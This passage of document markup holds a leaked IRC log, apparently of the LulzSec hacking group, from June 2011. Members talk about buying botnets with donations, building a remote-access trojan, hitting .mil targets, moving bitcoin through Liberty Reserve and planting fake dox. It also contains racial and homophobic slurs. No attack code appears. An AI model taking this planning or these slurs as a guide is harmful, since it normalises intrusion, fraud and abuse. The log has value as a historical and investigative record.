          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:47:19 [redacted] its called mis-information Jun 04 16:47:20 [redacted] :] Jun 04 16:47:23 Topiary twitter.com/lulzsec Jun 04 16:47:24 [redacted] not counter information Jun 04 16:47:29 trollpoll lol Jun 04 16:47:53 trollpoll saying something like... "cmon, stop asking us, we are not CIA op" Jun 04 16:48:02 trollpoll is the best way to make the ppl think we are.. Jun 04 16:49:27 neuron do people think anonymous is after us?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:49:42 trollpoll i think so, but storm doesnt :P Jun 04 16:50:52 storm who has operator status Jun 04 16:50:56 storm to see ips Jun 04 16:51:23 pwnsauce storm wants to packet xD Jun 04 16:51:27 storm yup Jun 04 16:51:28 storm :D Jun 04 16:52:12 Topiary don't worry about Anon being after you fine folks Jun 04 16:52:20 Topiary they have no idea about anyone outside of their own circlejerk Jun 04 16:52:25 neuron :p im not worried Jun 04 16:52:36 joepie91 o_O Jun 04 16:52:38 joepie91 avast Jun 04 16:52:40 joepie91 now has a sandbox Jun 04 16:52:41 neuron lol what are thye gonna do launch there loic canons my way Jun 04 16:52:47 joepie91 as in, actual sandbox Jun 04 16:53:05 * joepie91 thinks that's the first free antivirus with a sandbox feature Jun 04 16:56:17 trollpoll joepie91, any console app for twitter? xD Jun 04 16:56:43 trollpoll ive downloaded the python api but i feel that is excesive to make my own client just for loling that night...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:56:58 joepie91 http://www.mactricksandtips.com/2009/01/tweeting- to-twitter-from-terminal.html Jun 04 16:57:00 neuron naw lol worth it :P Jun 04 16:57:16 trollpoll tnx Jun 04 16:57:35 * joepie91 GONNA BE GOOGLE-FU FIGHTINGGG Jun 04 16:57:58 neuron THOSE PACKETS WERE FAST AS LIGHTNING Jun 04 16:58:12 neuron THE QUERYS WERE A LITTLE BIT FRIGHTING...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:58:28 trollpoll hmm, is not a client, but.. it will work Jun 04 16:58:59 pwnsauce Sacre Bleu! Those SYN and ACK!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 16:59:11 joepie91 mk Jun 04 16:59:14 joepie91 inb4 I disconnect Jun 04 17:00:21 trollpoll damn, ctr+v in links2 paste... crtl+c closes... Jun 04 17:00:35 trollpoll fuuuuuu Jun 04 17:00:47 pwnsauce ctrl SHIFT c Jun 04 17:01:24 trollpoll late... but thanks!xD Jun 04 17:01:52 lol do not trust this swan Jun 04 17:02:20 joepie91 so Jun 04 17:02:24 joepie91 the HMA client Jun 04 17:02:26 joepie91 is practically Jun 04 17:02:28 joepie91 crashing my system Jun 04 17:02:28 trollpoll Jun 04 17:02:30 joepie91 \o/ Jun 04 17:02:44 neuron lmfao joepie91 it just calls openvpn Jun 04 17:03:08 joepie91 ya idk Jun 04 17:03:11 joepie91 tell that to the client Jun 04 17:03:49 joepie91 4-6-2011 23:03:30 : SENT CONTROL [server]: 'PUSH_REQUEST' (status=1) Jun 04 17:03:50 joepie91 after this Jun 04 17:03:54 joepie91 it just starts using an entire CPU core Jun 04 17:03:58 joepie91 crash shit Jun 04 17:04:01 joepie91 use more and more memory Jun 04 17:04:04 joepie91 and not connect to the VPN Jun 04 17:04:28 neuron do Jun 04 17:04:33 neuron ./hma "Spain, Madrid" Jun 04 17:04:39 joepie91 what Jun 04 17:04:42 joepie91 I'm on windows atm -_- Jun 04 17:04:48 neuron lmfao that explains it :P Jun 04 17:04:57 joepie91 eh.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:05:03 joepie91 ultravpn has never caused any issues.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:07:18 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 17:07:25 * joepie92 (joepie91@HA-864.t9g.4u7qps.IP) has joined #pure- elite Jun 04 17:07:29 joepie92 well Jun 04 17:07:33 joepie92 PPTP works Jun 04 17:07:37 joepie92 but OpenVPN, no bone Jun 04 17:07:55 neuron use pptp Jun 04 17:08:31 joepie92 mm Jun 04 17:08:41 pwnsauce joepie92 Jun 04 17:08:44 joepie92 ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:08:47 pwnsauce how long should mtgox take Jun 04 17:08:52 pwnsauce to trnafer BTC to LR Jun 04 17:08:58 pwnsauce cos we transferred some Jun 04 17:09:00 joepie92 idk, I don't use LR Jun 04 17:09:02 pwnsauce and my balance is still 0 Jun 04 17:09:06 * joepie91 has quit (Ping timeout: 121 seconds) Jun 04 17:09:06 joepie92 I always do SEPA transfers Jun 04 17:09:10 * joepie92 is now known as joepie91 Jun 04 17:09:13 Topiary I sent you guys 2 BTC Jun 04 17:09:17 pwnsauce U5764978 Jun 04 17:09:25 pwnsauce that account is the one the LR needs to goto Jun 04 17:10:02 lol yeh might just take a while :) Jun 04 17:10:13 lol it went to mtgox and i sent to LR Jun 04 17:10:26 pwnsauce okey :D Il just keep checking :) Jun 04 17:10:45 neuron going from BTC to LR to USD?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:11:04 pwnsauce BTC -&gt; LR -&gt; Someone Elses LR i think Jun 04 17:11:23 sabu we need to own some serious bitcoins .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:12:18 pwnsauce aye Jun 04 17:12:20 pwnsauce Sabu Jun 04 17:12:23 pwnsauce ill PM Jun 04 17:14:14 storm we have 400+ in donations Jun 04 17:14:56 pwnsauce sheeeeet Jun 04 17:15:09 neuron lol dammn what are we gonna do with it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:15:09 joepie91 ok, now I mad Jun 04 17:15:15 joepie91 I have issues connecting to shit Jun 04 17:15:15 joepie91 :/ Jun 04 17:15:53 pwnsauce neuron - buy servers and bots Jun 04 17:16:27 Topiary already sent kayla money for bots, sending Sabu money for servers when he wants it Jun 04 17:16:30 Topiary we have 500USD in donations Jun 04 17:16:34 * tflow (bottle_of_@HA-r12.0jd.4c0nch.IP) has joined #pure- elite Jun 04 17:17:28 trollpoll really i wonder how ppl supports lulzsec more than Anonymous...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:17:41 joepie91 that is what I have been wondering about Jun 04 17:17:42 joepie91 :/ Jun 04 17:18:03 trollpoll that makes you think...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:18:30 Topiary LESS THINKING MORE DRINKING!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:19:18 trollpoll hehe, i drink... beer without alcohol!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:19:31 trollpoll and grog Jun 04 17:20:59 joepie91 mk Jun 04 17:20:59 joepie91 so Jun 04 17:21:03 joepie91 OpNoPro says Jun 04 17:21:08 joepie91 that 2 of the people in the dox are correct at least Jun 04 17:21:11 joepie91 and he doesn't know about the others Jun 04 17:21:12 joepie91 :p Jun 04 17:21:21 joepie91 also, trollpoll: I drink beer without alcohol occasionally Jun 04 17:21:24 &lt;io&gt; hm in what fox?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:21:27 &lt;io&gt; dox* Jun 04 17:21:30 joepie91 http://pastebin.com/RBjzDQbS Jun 04 17:21:52 &lt;io&gt; wat? how can 2 are correct lulz Jun 04 17:22:11 joepie91 ohwell Jun 04 17:22:21 joepie91 I will just follow his lead Jun 04 17:22:21 joepie91 :D Jun 04 17:22:32 Avunit Theyre all true!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:22:33 Avunit damnit! D: Jun 04 17:22:38 &lt;io&gt; heh. HE MUST KNOW IT Jun 04 17:22:46 &lt;io&gt; HE IS BADASS KINDA_PSEUDO_EX_SPOOK Jun 04 17:22:48 &lt;io&gt; or something Jun 04 17:22:52 joepie91 also Jun 04 17:22:55 Topiary he most know that shit, kayla and I wrote those dox and we HATE LULZSEC FAGGOTS Jun 04 17:22:59 joepie91 people seem to actually believe Jun 04 17:23:04 joepie91 that it's a CIA op Jun 04 17:23:07 joepie91 to show how unsafe the internet is Jun 04 17:23:09 Topiary I know, it's brilliant Jun 04 17:23:12 joepie91 and put more restrictions in place Jun 04 17:23:13 joepie91 my god Jun 04 17:23:17 joepie91 you just tell some bullshit story Jun 04 17:23:23 joepie91 and people fill in the rest for you Jun 04 17:23:24 joepie91 :D Jun 04 17:23:25 &lt;io&gt; as if they would need any excuse Jun 04 17:23:29 &lt;io&gt; lol, they make just shit up Jun 04 17:23:32 neuron i want people to say were aliens!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:23:34 &lt;io&gt; and if in doubt, they use the CP hammer Jun 04 17:23:35 joepie91 io: that's exactly what I have been saying Jun 04 17:23:37 joepie91 to people who go Jun 04 17:23:43 joepie91 OMG YOU SHOULD NOT HACK FOR FREEDOM Jun 04 17:23:46 Topiary &lt;parr0t&gt; did he enjoy pay?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:23:47 Topiary &lt;whirlpool&gt; definitely; it's a lot of money Jun 04 17:23:47 Topiary &lt;jux&gt; who? what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:23:47 Topiary &lt;whirlpool&gt; Topiary Jun 04 17:23:47 Topiary &lt;parr0t&gt; 5000 wow Jun 04 17:23:47 Topiary &lt;whirlpool&gt; 7500, he wanted more Jun 04 17:23:47 joepie91 IT WILL ONLY MAKE THEM CLAMP DOWN HARDER Jun 04 17:23:49 Topiary &lt;whirlpool&gt; couldn't exactly say no Jun 04 17:23:51 Topiary &lt;parr0t&gt; LOL Jun 04 17:23:53 Topiary &lt;jux&gt; USD?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:23:54 &lt;io&gt; WE MUST RESTRICTS THE INTERNETZ. THERE IS CP AND TERROR.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:23:55 Topiary &lt;whirlpool&gt; yep Jun 04 17:23:57 Topiary &lt;jux&gt; what for?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:23:59 Topiary &lt;whirlpool&gt; private :D Jun 04 17:24:01 Topiary &lt;jux&gt; lol k Jun 04 17:24:03 Topiary this will mindfuck EVERYONE Jun 04 17:24:10 joepie91 yeah, because a government person really cares whether their site is down or not, in pushing a bill Jun 04 17:24:10 joepie91 also lol Jun 04 17:24:27 lol guys i dont think us being on tht irc is a good idea Jun 04 17:24:33 lol please dont follow any of their links Jun 04 17:24:36 joepie91 what IRC?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:24:38 lol they know what they're doing Jun 04 17:24:46 joepie91 ED?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:24:50 lol yeh Jun 04 17:27:02 joepie91 can you guys connect to kerpia.cryto.net ? Jun 04 17:27:02 joepie91 irc Jun 04 17:27:26 Topiary everyone leave ED IRC Jun 04 17:27:35 Topiary this is serious, military hackers trying to hack us Jun 04 17:27:37 Topiary don't stay there Jun 04 17:28:17 pwnsauce i propose Operation:/b/ackraid Jun 04 17:28:23 pwnsauce we need .mil targets Jun 04 17:29:12 storm how do you know Topiary?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:29:27 Topiary they were PMing us Jun 04 17:29:30 Topiary acting like trolls Jun 04 17:29:32 storm logs?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:29:32 Topiary ask kayla Jun 04 17:29:38 Topiary kayla can you explain?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:29:46 storm please do.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:31:17 neuron lol: explain?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:31:19 lol look, those mil/fbi trolls are smart, everyone i talked to how claimed to be a hacker knows their shit and it not just pentesting shit i was going over scada which is like automation in machines and vulnerabilities and he was talking about clinet side attacks and shit they know what they're doing and you'd be a fool to think they're not there to pwn you Jun 04 17:31:52 lol we dont need to be on tht irc Jun 04 17:31:52 lol it's not safe Jun 04 17:32:00 sabu storm, quit with a ping timeout Jun 04 17:32:01 lol please just leave it Jun 04 17:32:05 neuron i think we should move to our newer irc Jun 04 17:32:06 storm I did?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:32:21 lol i really hope no one here has followed any of their links or opened any of their files Jun 04 17:32:29 Topiary don't think so Jun 04 17:32:39 storm i didnt Jun 04 17:32:42 neuron Im not in there and not oped so i didnt Jun 04 17:32:53 sabu ok Jun 04 17:33:02 sabu now that we had our public face the day Jun 04 17:33:06 sabu lets focus on our next moves Jun 04 17:33:25 sabu neuron what are you up to?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:33:28 lol everyone just leave tht server forget it exists Jun 04 17:33:39 neuron Sabu: me and pwnsauce are working on a nice RAT Jun 04 17:33:45 joepie91 k, so I can't find a route to host... to my own irc Jun 04 17:33:45 joepie91 wat do Jun 04 17:33:47 neuron that is my current focus Jun 04 17:34:09 neuron if im needed else were do tell Jun 04 17:34:10 lol most of them were talking really smarmy too like they had somethig on us Jun 04 17:34:28 lol if someone in this chan got owned we're all compromised now Jun 04 17:34:36 neuron 0-0\ Jun 04 17:34:45 sabu ok great Jun 04 17:34:53 neuron If you were on that chan and you opened a file. rm your box plox Jun 04 17:35:02 storm how do i make it look like i pinged?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:35:04 sabu neuron focus on the rat Jun 04 17:35:16 sabu /quit Ping timeout Jun 04 17:35:19 sabu rofl Jun 04 17:35:19 joepie91 storm Jun 04 17:35:19 joepie91 no Jun 04 17:35:22 joepie91 storm Jun 04 17:35:24 storm thats not a ping timeout Jun 04 17:35:25 storm lol Jun 04 17:35:27 joepie91 just literally pull your ethernet plug Jun 04 17:35:27 sabu hes already off Jun 04 17:35:29 storm thats jsut the reason Jun 04 17:35:30 [redacted] SO MUCH FOR OPSEC Jun 04 17:35:34 storm lol Jun 04 17:35:37 joepie91 literally pull your plug lol Jun 04 17:35:46 storm lol im not on from my home ip Jun 04 17:35:48 storm you doof Jun 04 17:35:50 storm i use shellz Jun 04 17:36:08 joepie91 ah, shell.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:36:09 joepie91 ye.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:36:10 joepie91 idk Jun 04 17:36:10 joepie91 lol Jun 04 17:36:30 joepie91 inb4 Ryan rages Jun 04 17:36:36 joepie91 and baleets fucking everyone Jun 04 17:37:10 Topiary Ryan needs a psychologist Jun 04 17:37:14 Topiary I will be his psychologist Jun 04 17:37:18 Topiary in return for bots Jun 04 17:37:20 joepie91 Topiary Jun 04 17:37:24 joepie91 don't start throwing chairs again Jun 04 17:37:25 joepie91 kthx Jun 04 17:37:27 joepie91 those things are expensive Jun 04 17:37:40 joepie91 like, seriously Jun 04 17:37:46 joepie91 you smashed a 300 euro chair on Barretts head Jun 04 17:37:47 joepie91 a few days ago Jun 04 17:37:48 joepie91 :| Jun 04 17:38:02 Topiary you're tripping me out bro Jun 04 17:38:06 joepie91 :D Jun 04 17:38:40 trollpoll sabu now that we had our public face the day &lt;--- lol bro Jun 04 17:38:46 joepie91 also Jun 04 17:38:53 joepie91 just saying Jun 04 17:38:58 joepie91 I read a blog post yesterday Jun 04 17:39:05 joepie91 that basically said LulzSec was a very good test to see Jun 04 17:39:09 joepie91 how anonymous Bitcoin really is Jun 04 17:39:15 neuron 0-0\ good point haha Jun 04 17:39:31 joepie91 tl;dr we are now lab rats Jun 04 17:39:32 tflow link?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:39:39 joepie91 lemme see if I can find it in my history Jun 04 17:39:45 * joepie91 opens way too many pages every day Jun 04 17:40:06 &lt;io&gt; yeah i read that too Jun 04 17:40:30 &lt;io&gt; http://techliberation.com/2011/06/03/bitcoin-silk-road- and-lulzsec-oh-my/ Jun 04 17:40:35 * lol has quit (Ping timeout: 121 seconds) Jun 04 17:40:42 tflow ah nice Jun 04 17:41:47 joepie91 fff Jun 04 17:41:54 joepie91 beat me to it Jun 04 17:41:55 joepie91 :( Jun 04 17:42:57 &lt;io&gt; joepie91google bitcoin lulzsec anonymous :p Jun 04 17:43:10 &lt;io&gt; faster than history heh Jun 04 17:43:22 joepie91 ye I did that Jun 04 17:43:26 joepie91 &gt;.&gt; Jun 04 17:43:58 &lt;io&gt; then you must type like my mom :D Jun 04 17:44:15 * trollpoll has quit (Ping timeout: 121 seconds) Jun 04 17:44:39 joepie91 notrly Jun 04 17:44:42 joepie91 lol Jun 04 17:44:46 joepie91 this vpn node sucks Jun 04 17:44:53 joepie91 I can't even connect to my own irc Jun 04 17:44:54 joepie91 :| Jun 04 17:45:01 joepie91 No route to host Jun 04 17:48:04 joepie91 this is almost scary Jun 04 17:48:11 joepie91 other person: I'm fapping, don't interrupt me Jun 04 17:48:16 joepie91 me: mk, cam, wanna see Jun 04 17:48:21 joepie91 other person: really? :o sec Jun 04 17:48:44 neuron wtf' Jun 04 17:49:29 * trollpoll (trollpoll@HA-9fh.11n.cc0br2.IP) has joined #pure-elite Jun 04 17:50:28 sabu joepie use the other vpn hosts Jun 04 17:50:37 storm halfdead is good pplz Jun 04 17:50:40 sabu youre telling me out the 80 vpn hosts hma has Jun 04 17:50:41 storm i see the pastebin Jun 04 17:50:46 sabu none of them connect?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:51:00 neuron storm: halfdead?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:51:04 joepie91 Sabu: actually after I typed that shit I connected to my IRC Jun 04 17:51:06 joepie91 idk what was wrong Jun 04 17:51:13 joepie91 and I don't like switching VPNs, all my shit has to reconnect Jun 04 17:51:14 joepie91 and shit Jun 04 17:51:50 [redacted] 90% of the IRC's convo is joepie saying stuff Jun 04 17:51:51 [redacted] :] Jun 04 17:51:52 storm ues Jun 04 17:51:54 storm yes Jun 04 17:52:01 storm hes a friend from #phrack Jun 04 17:52:03 storm hes hardcore Jun 04 17:52:21 joepie91 [redacted]: I know, I'm very talkative Jun 04 17:52:24 joepie91 a bit too talkative sometimes Jun 04 17:52:31 joepie91 on the other hand, works fairly well to gather intel :) Jun 04 17:53:33 sabu sup [redacted] you sexy ass nig Jun 04 17:53:38 storm sabu Jun 04 17:53:42 storm did you see this pastebin yet?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:53:52 storm http://pastebin.com/RBjzDQbS Jun 04 17:54:03 &lt;io&gt; he's op in #phrack on efnet Jun 04 17:54:12 &lt;io&gt; which is not the ezine btw but the group Jun 04 17:54:22 storm i know who he is Jun 04 17:54:23 storm ;p Jun 04 17:54:30 &lt;io&gt; someone asked above Jun 04 17:54:35 storm he is friends with 2l8 Jun 04 17:54:36 storm ah Jun 04 17:54:40 &lt;io&gt; neuron.. was just adding my info :) Jun 04 17:54:46 neuron lol Jun 04 17:54:47 storm :p Jun 04 17:55:16 joepie91 meh.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:55:18 joepie91 0.79mbps Jun 04 17:55:25 joepie91 methinks I'm going to try a different vpn node Jun 04 17:55:28 joepie91 in a bit Jun 04 17:55:29 joepie91 :P Jun 04 17:56:10 sabu true Jun 04 17:56:19 trollpoll man, this pastebin is very cool Jun 04 17:56:21 trollpoll who rote?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:56:25 trollpoll wrote* Jun 04 17:56:42 storm hm Jun 04 17:57:23 * joepie92 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pure- elite Jun 04 17:58:10 storm jux probably Jun 04 17:58:20 storm must be an agent Jun 04 17:59:27 trollpoll ok, so, here who is from CIA?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:59:31 * joepie91 has quit (Ping timeout: 121 seconds) Jun 04 17:59:35 trollpoll :) Jun 04 18:16:49 * Disconnected (Invalid argument).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
